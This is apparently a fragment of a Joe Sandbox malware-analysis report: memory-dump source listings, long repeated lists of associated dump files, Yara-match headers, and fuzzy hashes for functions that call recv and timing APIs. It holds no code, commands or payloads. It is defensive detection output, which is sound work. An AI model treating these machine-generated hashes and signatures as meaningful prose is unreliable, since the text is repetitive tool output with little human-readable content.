                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Initialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                            • Opcode ID: d1dea1d9f685f2ca6775be8764672c4b5e3640e00de0706dc522afa2812d4b59
                                                                                                                                            • Instruction ID: c89787ad1d9e0d53f6af5e3ccd9538c7728da4bc3532dbf35a3ee8f05a24be4e
                                                                                                                                            • Opcode Fuzzy Hash: d1dea1d9f685f2ca6775be8764672c4b5e3640e00de0706dc522afa2812d4b59
                                                                                                                                            • Instruction Fuzzy Hash: 5DB11670A10268DFEF28CF14C994BDEBBB5EF16308F5041D9E80967281D779AA84CF94
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 71e8cf77db49830cc9611d9d955df52bab3269033db6b28c4ef8bcb62991b5bf
                                                                                                                                            • Instruction ID: 79b66d4adb081785ff4ec2da62a8989049f1a85c92b82d15a19235e539c912e0
                                                                                                                                            • Opcode Fuzzy Hash: 71e8cf77db49830cc9611d9d955df52bab3269033db6b28c4ef8bcb62991b5bf
                                                                                                                                            • Instruction Fuzzy Hash: 8521366360E3D0AEC7535E3949A51D87F71AE2322032905EBC083CFA87F309556BC322
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 900bc6f5331a800c1bcced2b582b13a19df46b73b2546b8b78098a3cca1a0f98
                                                                                                                                            • Instruction ID: f961681af269eac2e459eab51f2ab559c6cc9c9fde9da268c07ef9f437ba4b81
                                                                                                                                            • Opcode Fuzzy Hash: 900bc6f5331a800c1bcced2b582b13a19df46b73b2546b8b78098a3cca1a0f98
                                                                                                                                            • Instruction Fuzzy Hash: 4001217B20F211EE8B822DA997816F9BF39FA067307204526E4074BE02F3606676A650
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 81964e9ebb9efd617fb0cbdc914c17d2665a473110647f35855f584d311a67e9
                                                                                                                                            • Instruction ID: fc4b95656d8a44098d5ba7fe4314c6487e915d7645a569f1c10bbcbbd64d9e5c
                                                                                                                                            • Opcode Fuzzy Hash: 81964e9ebb9efd617fb0cbdc914c17d2665a473110647f35855f584d311a67e9
                                                                                                                                            • Instruction Fuzzy Hash: F1F0207720E001EE8A832DA983901F96E3AFA0A6303300003F0074BE00F75022B2A211
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6bcdc0e842c4ef77061fdf786ad66e1c90dff3f39c2d6cb5fb9f0e7080dd658d
                                                                                                                                            • Instruction ID: 4c9ceebade54969ccc150f7e70f24cd09f19f68c1920214538e0ecde43e6b040
                                                                                                                                            • Opcode Fuzzy Hash: 6bcdc0e842c4ef77061fdf786ad66e1c90dff3f39c2d6cb5fb9f0e7080dd658d
                                                                                                                                            • Instruction Fuzzy Hash: 64E0D83714F141DE8A432EA992416E5BF39FE06A30320045AD0570FD00BB6461B1EA52
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a88d6a9793b025d1c11097e03d29b265b37a028a9923a28df4f1b594c0e0fee5
                                                                                                                                            • Instruction ID: c59294d11feb29f3f351def3336d2311b0f3ba1bf7c94b946165386653c86ee5
                                                                                                                                            • Opcode Fuzzy Hash: a88d6a9793b025d1c11097e03d29b265b37a028a9923a28df4f1b594c0e0fee5
                                                                                                                                            • Instruction Fuzzy Hash: B6E0263714E2029E8A833DBD43512E9BE3AB91AA303B1141790070FE11B76475B1A642
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 137762cf36cc53226f3bef3c68d225829d819318b7bb1dc7959fcfed3886cc78
                                                                                                                                            • Instruction ID: 96a67a6c8fedd4f31350087c43c5491c30875d4673949e7dad54860de3668bc9
                                                                                                                                            • Opcode Fuzzy Hash: 137762cf36cc53226f3bef3c68d225829d819318b7bb1dc7959fcfed3886cc78
                                                                                                                                            • Instruction Fuzzy Hash: A4D0A76715D5119D86473EBD53253E57E29FA1A7323641127E00B0FE01FF5632B1A640
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                            • Opcode ID: 61ada30855a2bed4aecfc026b05ab40628086347cdf3bfdf6b422c5a784e8a70
                                                                                                                                            • Instruction ID: ecff5f826ffbca968621a40d729115a5c07e9b661c1407cc98af2d3d0933fe74
                                                                                                                                            • Opcode Fuzzy Hash: 61ada30855a2bed4aecfc026b05ab40628086347cdf3bfdf6b422c5a784e8a70
                                                                                                                                            • Instruction Fuzzy Hash: F3C23871E086288FCB25CE28DD507AAB3B5EB88355F1441EBD84DE7340E779AE818F45
                                                                                                                                            APIs
                                                                                                                                            • recv.WS2_32(?,?,00000004,00000000), ref: 0049E10B
                                                                                                                                            • recv.WS2_32(?,?,00000008,00000000), ref: 0049E140
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: recv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                            • Opcode ID: 4053537f3fcfd6c481d2dc3fb7681161336bb2e1777daa34f71a7d2f9ee36385
                                                                                                                                            • Instruction ID: 42d399d947ab00f5c99242894235eea7141a30dc2fc6a51bf99339c04904c625
                                                                                                                                            • Opcode Fuzzy Hash: 4053537f3fcfd6c481d2dc3fb7681161336bb2e1777daa34f71a7d2f9ee36385
                                                                                                                                            • Instruction Fuzzy Hash: 5A31DD71A001445FDB10CB69DC85BBB7BBCEB09724F14063AF515EB3D1DA78A844CB58
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 376a5576fd4b68412969484e8d56b81b9300990959441ba6e7d287c5c1a7ddeb
                                                                                                                                            • Instruction ID: 68d8d79c116da8d910321e2f735107a65176f5bc27302fe2f72f4d6d025bc338
                                                                                                                                            • Opcode Fuzzy Hash: 376a5576fd4b68412969484e8d56b81b9300990959441ba6e7d287c5c1a7ddeb
                                                                                                                                            • Instruction Fuzzy Hash: 80F15D71E012199BDF14CFA8C9906AEB7B1FF89314F25826FD819AB344D735AE01CB94
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,004ACF52,?,00000003,00000003,?,004ACF87,?,?,?,00000003,00000003,?,004AC4FD,00492FB9,00000001), ref: 004ACC03
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
